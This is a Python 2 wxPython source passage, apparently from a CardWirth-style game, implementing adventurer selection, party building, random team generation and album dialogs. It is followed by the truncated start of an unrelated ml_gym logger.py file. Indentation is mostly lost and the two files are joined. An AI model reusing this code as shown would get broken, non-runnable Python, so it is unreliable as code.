self.sort = wx.Choice(self, size=(-1, cw.wins(20)), choices=choices)
self.sort.SetFont(cw.cwpy.rsrc.get_wxfont("combo", pixelsize=cw.wins(14)))
if cw.cwpy.setting.sort_standbys == "Name":
self.sort.Select(1)
elif cw.cwpy.setting.sort_standbys == "Level":
self.sort.Select(2)
else:
self.sort.Select(0)
# add
self.addbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_ADD, cw.wins((50, 23)), cw.cwpy.msgs["add_member"])
self.buttonlist.append(self.addbtn)
# info
self.infobtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), cw.cwpy.msgs["information"])
self.buttonlist.append(self.infobtn)
# new
self.newbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), cw.cwpy.msgs["new"])
self.buttonlist.append(self.newbtn)
# extension
self.exbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), cw.cwpy.msgs["extension"])
self.buttonlist.append(self.exbtn)
# view
s = cw.cwpy.msgs["member_list"] if self.views == 1 else cw.cwpy.msgs["member_one"]
self.viewbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), s)
self.buttonlist.append(self.viewbtn)
# close
self.closebtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_CANCEL, cw.wins((50, 23)), cw.cwpy.msgs["close"])
self.buttonlist.append(self.closebtn)
# additionals
self.create_addctrlbtn(self.toppanel, self._get_bg(), cw.cwpy.setting.show_additional_player)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.AddStretchSpacer(1)
sizer.Add(self.addctrlbtn, 0, wx.ALIGN_TOP, 0)
self.toppanel.SetSizer(sizer)
self.additionals.append(self.narrow_label)
self.additionals.append(self.narrow)
self.additionals.append(self.narrow_type)
self.additionals.append(self.sort_label)
self.additionals.append(self.sort)
self.update_additionals()
self.update_narrowcondition()
# layout
self._do_layout()
# bind
self._bind()
self.Bind(wx.EVT_BUTTON, self.OnClickAddBtn, self.addbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickInfoBtn, self.infobtn)
self.Bind(wx.EVT_BUTTON, self.OnClickNewBtn, self.newbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickExBtn, self.exbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickViewBtn, self.viewbtn)
self.Bind(wx.EVT_CHOICE, self.OnSort, self.sort)
self.toppanel.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDClick)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(cw.wins((383, 0)), 0)
sizer.Add(self.sort, 0, wx.TOP, cw.wins(2))
self.toppanel.SetSizer(sizer)
self.toppanel.Layout()
seq = self.accels
newcreateid = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnClickNewBtn, id=newcreateid)
seq.append((wx.ACCEL_CTRL, ord('N'), newcreateid))
randomcreateid = wx.NewId()
self.Bind(wx.EVT_MENU, self.create_randomadventurer, id=randomcreateid)
seq.append((wx.ACCEL_CTRL, ord('A'), randomcreateid))
self.sortkeydown = []
for i in xrange(0, 9):
sortkeydown = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnNumberKeyDown, id=sortkeydown)
seq.append((wx.ACCEL_CTRL, ord('1')+i, sortkeydown))
self.sortkeydown.append(sortkeydown)
self.append_addctrlaccelerator(seq)
cw.util.set_acceleratortable(self, seq)
def save_views(self, multi):
cw.cwpy.setting.show_multipleplayers = multi
def update_additionals(self):
Select.update_additionals(self)
cw.cwpy.setting.show_additional_player = self.addctrlbtn.GetToggle()
def OnKeyDown(self, event):
if event.GetKeyCode() == wx.WXK_DELETE and self.list:
self.delete_adventurer()
return
def _add_topsizer(self):
nsizer = wx.BoxSizer(wx.HORIZONTAL)
nsizer.Add(self.narrow_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(2))
nsizer.Add(self.narrow, 1, wx.CENTER, 0)
nsizer.Add(self.narrow_type, 0, wx.CENTER|wx.EXPAND, cw.wins(3))
nsizer.Add(self.sort_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(3))
nsizer.Add(self.sort, 0, wx.CENTER|wx.EXPAND, 0)
self.topsizer.Add(nsizer, 0, wx.EXPAND, 0)
def _on_narrowcondition(self):
cw.cwpy.setting.standbys_narrowtype = self.narrow_type.GetSelection()
self.update_narrowcondition()
self.draw(True)
def update_narrowcondition(self):
        if 0 <= self.index < len(self.list):
selected = self.list[self.index]
else:
selected = None
if self.isalbum:
self.list = cw.cwpy.ydata.album[:]
else:
self.list = cw.cwpy.ydata.standbys[:]
narrow = self.narrow.GetValue().lower()
donarrow = self.narrow.IsShown() and bool(narrow)
if donarrow:
hiddens = set([u"_", u"@"])
attrs = set(cw.cwpy.setting.periodnames)
attrs.update(cw.cwpy.setting.sexnames)
attrs.update(cw.cwpy.setting.naturenames)
attrs.update(cw.cwpy.setting.makingnames)
_NARROW_ALL = 0
_NARROW_NAME = 1
_NARROW_DESC = 2
_NARROW_HISTORY = 3
_NARROW_FEATURES = 4
_NARROW_LEVEL = 5
ntype = self.narrow_type.GetSelection()
if ntype in (_NARROW_LEVEL, _NARROW_ALL):
                # Level
try:
intnarrow = int(narrow)
except:
intnarrow = None
ntypes = set()
if ntype == _NARROW_ALL:
ntypes.add(_NARROW_NAME)
ntypes.add(_NARROW_DESC)
ntypes.add(_NARROW_HISTORY)
ntypes.add(_NARROW_FEATURES)
ntypes.add(_NARROW_LEVEL)
else:
ntypes.add(ntype)
seq = []
for header in self.list:
def has_history():
for coupon in header.history:
if coupon:
if cw.cwpy.is_debugmode():
if coupon[0] == u"_" and coupon[1:] in attrs:
continue
else:
if coupon[0] in hiddens:
continue
if narrow in coupon.lower():
return True
return False
def has_features():
for coupon in header.history:
if coupon and coupon[0] == u"_":
coupon = coupon[1:]
if coupon in attrs:
if narrow in coupon.lower():
return True
return False
if (_NARROW_NAME in ntypes and narrow in header.name.lower()) or\
(_NARROW_DESC in ntypes and narrow in header.desc.lower()) or\
(_NARROW_HISTORY in ntypes and has_history()) or\
(_NARROW_FEATURES in ntypes and has_features()) or\
                (_NARROW_LEVEL in ntypes and intnarrow is not None and header.level == intnarrow):
seq.append(header)
self.list = seq
if selected in self.list:
self.index = self.list.index(selected)
elif self.list:
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
def OnNumberKeyDown(self, event):
"""
        Handle presses of the number keys '1' through '9'.
        In PlayerSelect this changes the sort condition.
"""
if self._processing:
return
if self.sort.IsShown():
index = self.sortkeydown.index(event.GetId())
if index < self.sort.GetCount():
self.sort.SetSelection(index)
event = wx.PyCommandEvent(wx.wxEVT_COMMAND_CHOICE_SELECTED, self.sort.GetId())
self.ProcessEvent(event)
    def enable_btn(self):
        # Disable the buttons when the list is empty
        disables = set()
        # Disable the add button when the party already has six members
        if len(cw.cwpy.get_pcards()) == 6:
            disables.add(self.addbtn)
        if not self.list:
            self._disable_btn((self.newbtn, self.closebtn, self.exbtn, self.viewbtn))
            self.index = 0
        else:
            if len(self.list) <= self.views:
                disables.update((self.rightbtn, self.right2btn, self.leftbtn, self.left2btn))
            self._enable_btn(disables)
def OnSort(self, event):
if self._processing:
return
if self.isalbum:
return
index = self.sort.GetSelection()
if index == 1:
sorttype = "Name"
elif index == 2:
sorttype = "Level"
else:
sorttype = "None"
if cw.cwpy.setting.sort_standbys <> sorttype:
cw.cwpy.play_sound("page")
cw.cwpy.setting.sort_standbys = sorttype
cw.cwpy.ydata.sort_standbys()
self.update_narrowcondition()
self.draw(True)
def can_clickcenter(self):
return self.addbtn.IsEnabled()
def OnLeftDClick(self, event):
        # In list view a double-click adds the member to the party
if self._processing:
return
if len(cw.cwpy.get_pcards()) == 6:
return
MultiViewSelect.OnLeftDClick(self, event)
def OnMouseWheel(self, event):
if cw.util.has_modalchild(self):
return
if self._processing:
return
if change_combo(self.narrow_type, event):
return
elif change_combo(self.sort, event):
return
else:
MultiViewSelect.OnMouseWheel(self, event)
def OnSelect(self, event):
if self._processing:
return
if self.views == 1:
            # With a single entry shown, selecting it adds the member
if not self.list or len(cw.cwpy.get_pcards()) == 6:
return
MultiViewSelect.OnSelect(self, event)
def OnClickNewBtn(self, event):
if self._processing:
return
cw.cwpy.play_sound("click")
if cw.cwpy.setting.debug:
title = cw.cwpy.msgs["select_creator"]
items = [
(cw.cwpy.msgs["create_normal"], cw.cwpy.msgs["create_normal_description"], self._create_normal, True),
(cw.cwpy.msgs["create_debug"], cw.cwpy.msgs["create_debug_description"], self._create_debug, True),
]
dlg = cw.dialog.etc.ExtensionDialog(self, title, items)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
else:
self._create_normal()
def _create_normal(self):
dlg = cw.dialog.create.AdventurerCreater(self)
cw.cwpy.frame.move_dlg(dlg)
self._create_common(dlg)
def _create_debug(self):
dlg = cw.debug.charaedit.CharacterEditDialog(self, create=True)
cw.cwpy.frame.move_dlg(dlg)
self._create_common(dlg)
def _create_common(self, dlg):
if dlg.ShowModal() == wx.ID_OK:
cw.cwpy.play_sound("page")
header = cw.cwpy.ydata.add_standbys(dlg.fpath)
            # Refresh the list
self.update_narrowcondition()
if header in self.list:
self.index = self.list.index(header)
self.enable_btn()
self.draw(True)
dlg.Destroy()
def get_selected(self):
if self.list:
return self.list[self.index]
else:
return None
def update_standbys(self, selected):
self.update_narrowcondition()
if selected and selected in self.list:
self.index = self.list.index(selected)
else:
if len(self.list):
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
self.draw(True)
def OnClickAddBtn(self, event):
if self._processing:
return
        if not self.list:
            return
        self._processing = True
header = self.list[self.index]
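        # PlayerSelect._add must run on the engine thread (cw.cwpy.exec_func);
        # the UI is refreshed afterwards via cw.cwpy.frame.exec_func.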
def func(panel, header, index):
if PlayerSelect._add(header):
def func(panel):
if panel:
panel._processing = False
self.update_narrowcondition()
if len(panel.list):
panel.index %= len(panel.list)
else:
panel.index = 0
panel.enable_btn()
panel.draw(True)
cw.cwpy.frame.exec_func(func, panel)
else:
def func(panel):
if panel:
panel._processing = False
cw.cwpy.frame.exec_func(func, panel)
cw.cwpy.exec_func(func, self, header, self.index)
@staticmethod
def _add(header):
assert threading.currentThread() == cw.cwpy
if cw.cwpy.ydata.party:
if len(cw.cwpy.ydata.party.members) < 6:
cw.cwpy.play_sound("harvest")
cw.cwpy.ydata.standbys.remove(header)
cw.cwpy.ydata.party.add(header)
if cw.cwpy.areaid == cw.AREA_BREAKUP:
cw.cwpy.create_poschangearrow()
return True
else:
                # The member could not be added
return False
else:
cw.cwpy.play_sound("harvest")
cw.cwpy.ydata.standbys.remove(header)
cw.cwpy.ydata.create_party(header, chgarea=False)
return True
def OnClickExBtn(self, event):
"""
        Extension menu.
"""
if self._processing:
return
cw.cwpy.play_sound("click")
if self.list:
name = self.list[self.index].name
title = cw.cwpy.msgs["extension_title"] % (name)
else:
title = cw.cwpy.msgs["extension_title_2"]
items = [
(cw.cwpy.msgs["grow"], cw.cwpy.msgs["grow_adventurer_description"], self.grow_adventurer, bool(self.list)),
(cw.cwpy.msgs["delete"], cw.cwpy.msgs["delete_adventurer_description"], self.delete_adventurer, bool(self.list)),
(cw.cwpy.msgs["select_party_record"], cw.cwpy.msgs["select_party_record_description"], self.select_partyrecord, bool(cw.cwpy.ydata.party or cw.cwpy.ydata.partyrecord)),
(cw.cwpy.msgs["random_character"], cw.cwpy.msgs["random_character_description"], self.create_randomadventurer, True),
(cw.cwpy.msgs["random_team"], cw.cwpy.msgs["random_team_description"], self.random_team, bool(cw.cwpy.ydata.standbys and self.addbtn.IsEnabled()))
]
dlg = cw.dialog.etc.ExtensionDialog(self, title, items)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def grow_adventurer(self):
"""冒険者を成長させる。
"""
header = self.list[self.index]
age = header.age
index = cw.cwpy.setting.periodcoupons.index(age)
#TODO: handle growth-prohibited characters
#if header.nogrow:
# cw.cwpy.play_sound("error")
# return
if index < 0:
# Invalid age period; can happen when the skin differs
cw.cwpy.play_sound("error")
return
if index == len(cw.cwpy.setting.periodcoupons) - 1:
nextage = None
s = cw.cwpy.msgs["confirm_die"] % (header.name)
else:
nextage = cw.cwpy.setting.periodcoupons[index + 1]
s = cw.cwpy.msgs["confirm_grow"] % (header.name, age[1:], nextage[1:])
cw.cwpy.play_sound("signal")
dlg = cw.dialog.message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
cw.cwpy.play_sound("harvest")
if nextage:
header.grow()
else:
s = cw.cwpy.msgs["die_message"] % (header.name)
dlg = cw.dialog.message.Message(self, cw.cwpy.msgs["message"], s, 2)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
self._move_allcards(header)
if not header.leavenoalbum:
path = cw.xmlcreater.create_albumpage(header.fpath)
cw.cwpy.ydata.add_album(path)
for partyrecord in cw.cwpy.ydata.partyrecord:
partyrecord.vanish_member(header.fpath)
cw.cwpy.ydata.remove_emptypartyrecord()
cw.cwpy.remove_xml(header)
cw.cwpy.ydata.standbys.remove(header)
for partyrecord in cw.cwpy.ydata.partyrecord:
partyrecord.vanish_member(header.fpath)
cw.cwpy.ydata.remove_emptypartyrecord()
self.update_narrowcondition()
if len(self.list):
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
self.draw(True)
else:
dlg.Destroy()
def delete_adventurer(self):
"""冒険者を削除する。
"""
cw.cwpy.play_sound("signal")
header = self.list[self.index]
s = cw.cwpy.msgs["confirm_delete_character"] % (header.name)
dlg = cw.dialog.message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
cw.cwpy.play_sound("dump")
self._delete_adventurer(header)
self.enable_btn()
self.draw(True)
dlg.Destroy()
def _move_allcards(self, header):
# Move all hand cards to the storehouse
data = cw.data.yadoxml2etree(header.fpath)
ccard = cw.character.Character(data)
for pocket in ccard.cardpocket:
for card in pocket[:]:
cw.cwpy.trade("STOREHOUSE", header=card, from_event=True, sort=False)
cw.cwpy.ydata.sort_storehouse()
def _delete_adventurer(self, header):
if cw.cwpy.ydata:
cw.cwpy.ydata.changed()
self._move_allcards(header)
# If level 3 or higher and lacking the "_消滅予約" (vanish reservation) coupon, keep the character in the album
#if header.level >= 3 and not header.leavenoalbum:
# path = cw.xmlcreater.create_albumpage(header.fpath, nocoupon=True)
# cw.cwpy.ydata.add_album(path)
for partyrecord in cw.cwpy.ydata.partyrecord:
partyrecord.vanish_member(header.fpath)
cw.cwpy.ydata.remove_emptypartyrecord()
cw.cwpy.remove_xml(header)
cw.cwpy.ydata.standbys.remove(header)
for partyrecord in cw.cwpy.ydata.partyrecord:
partyrecord.vanish_member(header.fpath)
cw.cwpy.ydata.remove_emptypartyrecord()
self.update_narrowcondition()
if len(self.list):
self.index %= len(self.list)
else:
self.index = 0
def select_partyrecord(self):
"""編成記録ダイアログを開く。
"""
cw.cwpy.play_sound("click")
dlg = cw.dialog.partyrecord.SelectPartyRecord(self)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def random_team(self):
"""ランダムな編成のチームを組む。
"""
if self._processing:
return
self._processing = True
def func(panel):
class Pocket(object):
def __init__(self, header, point):
self.header = header
self.point = point
while cw.cwpy.ydata.standbys and (not cw.cwpy.ydata.party or\
len(cw.cwpy.ydata.party.members) < 6):
if cw.cwpy.ydata:
cw.cwpy.ydata.changed()
if not cw.cwpy.ydata.party:
PlayerSelect._add(cw.cwpy.dice.choice(cw.cwpy.ydata.standbys))
else:
seq = self.calc_needs(cw.cwpy.ydata.standbys)
seq2 = []
for need, header in cw.cwpy.dice.shuffle(seq):
point = cw.cwpy.dice.roll(1, need)
seq2.append(Pocket(header, point))
cw.util.sort_by_attr(seq2, "point")
PlayerSelect._add(seq2[0].header)
def func(panel):
if panel:
panel._processing = False
panel.update_narrowcondition()
if len(panel.list):
panel.index %= len(panel.list)
else:
panel.index = 0
panel.enable_btn()
panel.draw(True)
cw.cwpy.frame.exec_func(func, panel)
cw.cwpy.exec_func(func, self)
def create_randomadventurer(self, ex=False):
"""ランダムな特性を持つキャラクターを生成する。
"""
if self._processing:
return
self._processing = True
cw.cwpy.play_sound("signal")
info = cw.debug.charaedit.CharaInfo(None)
info.set_randomfeatures()
fpath = info.create_adventurer(setlevel=False)
header = cw.cwpy.ydata.add_standbys(fpath)
# Refresh the list
self.narrow.SetValue(u"")
self.update_narrowcondition()
if header in self.list:
self.index = self.list.index(header)
chgviews = self.views != 1
if chgviews:
self.change_view()
self.draw(True)
# If a *Names.txt file exists, pick an initial name
sex = header.get_sex()
randomname = cw.dialog.create.get_randomname(sex)
def random_name():
return cw.dialog.create.get_randomname(sex)
addition = cw.cwpy.msgs["auto"] if cw.cwpy.setting.show_autobuttoninentrydialog else ""
addition_func = random_name if cw.cwpy.setting.show_autobuttoninentrydialog else None
dlg = cw.dialog.edit.InputTextDialog(self, cw.cwpy.msgs["naming"],
cw.cwpy.msgs["naming_random_character"],
text=randomname,
maxlength=14,
addition=addition,
addition_func=addition_func)
self.Parent.move_dlg(dlg, point=(cw.wins(130), cw.wins(0)))
if dlg.ShowModal() == wx.ID_OK:
if cw.cwpy.ydata:
cw.cwpy.ydata.changed()
cw.cwpy.play_sound("harvest")
data = cw.data.yadoxml2etree(header.fpath)
ccard = cw.character.Character(data)
ccard.set_name(dlg.text)
ccard.data.is_edited = True
ccard.data.write_xml()
header.name = dlg.text
else:
cw.cwpy.play_sound("dump")
self._delete_adventurer(header)
dlg.Destroy()
if chgviews:
self.change_view()
self.draw(True)
self.enable_btn()
self._processing = False
def OnClickInfoBtn(self, event):
if self._processing:
return
cw.cwpy.play_sound("click")
dlg = charainfo.StandbyCharaInfo(self, self.list, self.index, self.update_character)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def update_character(self):
def func():
header = self.list[self.index]
order = header.order
if self.isalbum:
index = cw.cwpy.ydata.album.index(header)
header = cw.cwpy.ydata.create_advheader(header.fpath)
header.order = order
cw.cwpy.ydata.album[index] = header
else:
index = cw.cwpy.ydata.standbys.index(header)
header = cw.cwpy.ydata.create_advheader(header.fpath)
header.order = order
cw.cwpy.ydata.standbys[index] = header
self.list[self.index] = header
self.update_narrowcondition()
cw.cwpy.frame.exec_func(self.draw, True)
cw.cwpy.exec_func(func)
def calc_needs(self, mlist):
"""mlist内のメンバに対して、現在のパーティの構成から
パーティにおける必要度を計算する。
レベルが近く、同型のメンバが少ないほど必要度が高くなる。
"""
if cw.cwpy.ydata.party:
talents = set(cw.cwpy.setting.naturecoupons)
types = {}
level = 0.0
seq = []
for member in cw.cwpy.get_pcards():
level += member.level
talent = member.get_talent()
val = types.get(talent, 0)
val += 1
types[talent] = val
level /= len(cw.cwpy.ydata.party.members)
for header in mlist:
# Lower the need once for each same-type member already in the party
need = 10
talent = cw.cwpy.setting.naturecoupons[0]
for coupon in header.history:
if coupon in talents:
talent = coupon
break
val = types.get(talent, 0)
for _i in xrange(val):
need *= 2
# Lower the need the further the level is from the party average
val = level - header.level
if val < 0:
val = -val
for _i in xrange(int(val+0.5)):
need *= 4
seq.append((int(need), header))
return seq
else:
return [(10, header) for header in mlist]
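# Worked example (a sketch of the weighting above): with a party
# average level of 5.0, a level-3 candidate whose talent already
# appears twice in the party gets need = 10 * 2**2 * 4**2 = 640,
# while a level-5 candidate with an unrepresented talent stays at 10.
# random_team() then rolls 1dN per weight, sorts by the roll and
# takes the first entry, so, assuming an ascending sort, the small
# weights (the most needed members) tend to win.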
def _get_bg(self):
if self._bg:
return self._bg
path = "Table/Book"
path = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir, path), cw.cwpy.rsrc.ext_img)
self._bg = cw.util.load_wxbmp(path, can_loaded_scaledimage=True)
return self._bg
def draw(self, update=False):
dc = MultiViewSelect.draw(self, update)
# Background
bmp = cw.wins(self._get_bg())
bmpw = bmp.GetSize()[0]
dc.DrawBitmap(bmp, 0, 0, False)
if self.list:
if self.views == 1:
header = self.list[self.index % len(self.list)]
# Level
dc.SetTextForeground(wx.BLACK)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = cw.cwpy.msgs["character_level"]
w = dc.GetTextExtent(s)[0]
if header.level < 10:
dc.DrawText(s, cw.wins(64), cw.wins(42))
w = w + 5
else:
dc.DrawText(s, cw.wins(59), cw.wins(42))
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(25)))
s = str(header.level)
y = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(65) + w, cw.wins(34))
w = w + y
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = cw.cwpy.msgs["character_class"]
dc.DrawText(s, cw.wins(70) + w, cw.wins(42))
# Name
dc.SetFont(cw.cwpy.rsrc.get_wxfont("inputname", pixelsize=cw.wins(22)))
s = header.name
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(125) - w / 2, cw.wins(67))
# Image
dc.SetClippingRect(cw.wins((88, 90, 74, 94)))
can_loaded_scaledimage = cw.util.str2bool(cw.header.GetRootAttribute(header.fpath).attrs.get("scaledimage", "False"))
for info in header.imgpaths:
path = cw.util.join_yadodir(info.path)
bmp = cw.util.load_wxbmp(path, True, can_loaded_scaledimage=can_loaded_scaledimage)
bmp2 = cw.wins(bmp)
baserect = info.calc_basecardposition_wx(bmp2.GetSize(), noscale=False,
basecardtype="LargeCard",
cardpostype="NotCard")
cw.imageretouch.wxblit_2bitbmp_to_card(dc, bmp2, cw.wins(88)+baserect.x, cw.wins(90)+baserect.y, True, bitsizekey=bmp)
dc.DestroyClippingRegion()
# Age
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = cw.cwpy.msgs["character_age"] % (header.get_age())
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(127) - w / 2, cw.wins(195))
# Sex
s = cw.cwpy.msgs["character_sex"] % (header.get_sex())
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(127) - w / 2, cw.wins(210))
# EP
s = cw.cwpy.msgs["character_ep"] % (header.ep)
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(127) - w / 2, cw.wins(225))
# Coupons (up to 9, newest first)
hiddens = set([u"_", u"@"])
dc.SetFont(cw.cwpy.rsrc.get_wxfont("charadesc", pixelsize=cw.wins(14)))
s = cw.cwpy.msgs["character_history"]
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(320) - w / 2, cw.wins(65))
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
history = []
for s in header.history:
if s and not s[0] in hiddens:
history.append(s)
if 9 < len(history):
history[-1] = cw.cwpy.msgs["history_etc"]
break
for index, s in enumerate(history):
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(320) - w / 2, cw.wins(95) + cw.wins(14) * index)
# Page number
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = str(self.index+1) if self.index > 0 else str(-self.index + 1)
s = s + " / " + str(len(self.list))
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(250))
else:
page = self.get_page()
sindex = page * self.views
seq = self.list[sindex:sindex+self.views]
x = 0
y = 0
size = self.toppanel.GetSize()
rw = size[0] / (self.views / 2)
rh = size[1] / 2
dc.SetTextForeground(wx.BLACK)
for i, header in enumerate(seq):
# Image
ix = x + (rw - cw.wins(72)) / 2
iy = y + 5
dc.SetClippingRect((ix, iy, cw.wins(74), cw.wins(94)))
can_loaded_scaledimage = cw.util.str2bool(cw.header.GetRootAttribute(header.fpath).attrs.get("scaledimage", "False"))
for info in header.imgpaths:
path = cw.util.join_yadodir(info.path)
bmp = cw.util.load_wxbmp(path, True, can_loaded_scaledimage=can_loaded_scaledimage)
bmp2 = cw.wins(bmp)
baserect = info.calc_basecardposition_wx(bmp2.GetSize(), noscale=False,
basecardtype="LargeCard",
cardpostype="NotCard")
cw.imageretouch.wxblit_2bitbmp_to_card(dc, bmp2, ix+baserect.x, iy+baserect.y, True, bitsizekey=bmp)
dc.DestroyClippingRegion()
# Name
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = header.name
s = cw.util.abbr_longstr(dc, s, rw)
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, x + (rw - w) / 2, y + cw.wins(105))
# Level
space = cw.wins(5)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s1 = cw.cwpy.msgs["character_level"]
w1, h1 = dc.GetTextExtent(s1)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(17)))
s2 = str(header.level)
w2, h2 = dc.GetTextExtent(s2)
sx = x + (rw - (w1+cw.wins(5)+w2+space)) / 2
sy = y + cw.wins(120)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
cw.util.draw_witharound(dc, s1, sx, sy + (h2-h1))
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(17)))
cw.util.draw_witharound(dc, s2, sx + w1 + space + cw.wins(5), sy)
# Selected
if sindex + i == self.index:
bmp = cw.cwpy.rsrc.wxstatuses["TARGET"]
dc.DrawBitmap(bmp, ix + cw.wins(58), iy + cw.wins(80), True)
if self.views / 2 == i + 1:
x = 0
y += rh
else:
x += rw
# Page number
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = str(page+1) if page > 0 else str(-page + 1)
s = s + " / " + str(self.get_pagecount())
cw.util.draw_witharound(dc, s, cw.wins(5), cw.wins(5))
#-------------------------------------------------------------------------------
# Album dialog
#-------------------------------------------------------------------------------
class Album(PlayerSelect):
"""
Album dialog.
Inherits from the adventurer selection dialog.
"""
def __init__(self, parent):
# Create the dialog box
Select.__init__(self, parent, cw.cwpy.msgs["album"])
self._bg = None
# Adventurer info
self.list = cw.cwpy.ydata.album
self.isalbum = True
self.index = 0
self.views = 1
self.sort = None
# toppanel
self.toppanel = wx.Panel(self, -1, size=cw.wins((460, 280)))
# info
self.infobtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_PROPERTIES, cw.wins((90, 23)), cw.cwpy.msgs["information"])
self.buttonlist.append(self.infobtn)
# delete
self.delbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_DELETE, cw.wins((90, 23)), cw.cwpy.msgs["delete"])
self.buttonlist.append(self.delbtn)
# close
self.closebtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_CANCEL, cw.wins((90, 23)), cw.cwpy.msgs["close"])
self.buttonlist.append(self.closebtn)
# enable btn
self.enable_btn()
# layout
self._do_layout()
# bind
self._bind()
self.Bind(wx.EVT_BUTTON, self.OnClickInfoBtn, self.infobtn)
self.Bind(wx.EVT_BUTTON, self.OnClickDelBtn, self.delbtn)
def can_clickcenter(self):
return False
def OnMouseWheel(self, event):
Select.OnMouseWheel(self, event)
def OnKeyDown(self, event):
if event.GetKeyCode() == wx.WXK_DELETE and self.list:
return self.OnClickDelBtn(event)
def _add_topsizer(self):
pass
def update_narrowcondition(self):
pass
def OnClickDelBtn(self, event):
cw.cwpy.play_sound("signal")
header = self.list[self.index]
s = cw.cwpy.msgs["confirm_delete_character_in_album"] % (header.name)
dlg = cw.dialog.message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
cw.cwpy.play_sound("dump")
cw.cwpy.remove_xml(header)
cw.cwpy.ydata.album.remove(header)
if len(self.list):
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
self.draw(True)
dlg.Destroy()
def enable_btn(self):
# Disable the buttons when the list is empty
if not self.list:
self._disable_btn((self.closebtn,))
elif len(self.list) == 1:
self._enable_btn((self.rightbtn, self.right2btn, self.leftbtn, self.left2btn))
else:
self._enable_btn()
def OnSelect(self, event):
pass
def change_combo(combo, event):
if combo and combo.IsShown() and combo.GetRect().Contains(event.GetPosition()):
index = combo.GetSelection()
count = combo.GetCount()
if cw.util.get_wheelrotation(event) > 0:
if index <= 0:
index = count - 1
else:
index -= 1
else:
if count <= index + 1:
index = 0
else:
index += 1
combo.Select(index)
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_CHOICE_SELECTED, combo.GetId())
combo.ProcessEvent(btnevent)
return True
else:
return False
def main():
pass
if __name__ == "__main__":
main()
|
logger.py
|
import logging
import os
from multiprocessing import Queue, Process
from dataclasses import dataclass
import time
from abc import ABC, abstractmethod
from enum import Enum
import sys
import traceback
from ml_gym.error_handling.exception import SingletonAlreadyInstantiatedError
class LogLevel(Enum):
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
@dataclass
class Message:
logger_id: str
message_string: str
unix_timestamp: float
level: LogLevel
class MLgymLoggerIF(ABC):
def __init__(self, logger_id: str):
self.logger_id = logger_id
def build_message(self, level: LogLevel, message: str) -> Message:
timestamp = time.time()
message = Message(message_string=message, unix_timestamp=timestamp, level=level, logger_id=self.logger_id)
return message
@abstractmethod
